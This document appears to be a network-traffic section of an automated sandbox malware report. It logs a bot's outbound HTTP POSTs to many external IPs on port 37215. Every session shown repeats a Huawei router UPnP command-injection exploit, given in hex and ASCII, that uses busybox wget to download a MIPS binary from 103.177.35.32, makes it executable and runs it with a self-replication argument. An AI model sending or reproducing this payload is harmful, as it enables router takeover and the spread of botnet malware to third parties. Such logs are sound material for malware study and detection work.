                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        177192.168.2.2338690197.220.52.24837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300194025 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        178192.168.2.2344116124.121.231.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300199986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        179192.168.2.233370841.6.65.8837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300246954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        180192.168.2.235662841.131.32.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300246954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        181192.168.2.234976241.113.228.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300882101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        182192.168.2.234595831.109.136.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300909042 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        183192.168.2.2347580197.67.83.20137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300924063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        184192.168.2.2357958157.65.135.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300964117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        185192.168.2.234356241.176.239.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.300995111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        186192.168.2.235829241.242.92.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.301012993 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
